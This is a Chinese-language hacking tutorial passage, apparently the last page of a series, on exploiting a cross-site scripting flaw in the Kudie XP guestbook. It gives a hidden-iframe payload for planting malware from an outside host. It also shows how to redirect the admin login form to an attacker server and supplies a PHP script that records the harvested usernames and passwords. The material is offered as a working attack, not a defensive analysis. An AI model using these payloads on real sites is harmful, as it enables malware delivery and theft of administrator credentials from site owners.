酷蝶XP留言簿的跨站利用

大家看看返回了什么，直接就可以改页面了，如图6所示。

　如果想挂马就更容易了，JS内容改为：

以下是引用片段： document.write("<iframe style='display:none;' src='http://xxx.com/xx.htm&#39;%3E%3C/iframe%3E%22);

就可以了。

那能不能在高级点呢，其实我们还可以把页面变成一个自己操纵的登录页面，将表单的值指向远程服务器上的程序，这个很久以前剑心就提到过了，是个ASP的程序，不过和PHP都是一样的，在地址栏提交：javascript:alert(document.forms.length)，会弹出当前页面几个表单，如图7所示。
javascript:alert(document.forms[0].action)，查看第一个表单的属性，指向/test/index.php?actioin=add，图8所示。


　只要我们改了表单的action属性就会钓到管理员帐号和密码，只要在JS里改成document.forms[下标].action="http://hacklu.net/test/pass.PHP，
pass.php内容如下：

以下是引用片段： <?php Header("Location: http://127.0.0.1:81/test/index.php?%22); if(isset($_POST['$admin_name'])&&isset($_POST['$admin_pass'])){ $file_path="password.txt"; $file = @fopen($file_path,"a"); $string = "Username:".$_POST['a_name']."and password:".$_POST['a_pass']."\n"; @fwrite($file,$string); @fclose($file); } ?>

　我们在用javascript:alert(document.forms[0].action)来看看，已经指向远程服务器文件了，如图9。

这样只要管理员登录就会直接钓到登陆的帐号。过程只在一瞬间
就完成了。其实这也不是什么新技术，我只是站在前人思路写一下。

上一页  [1] [2] [3]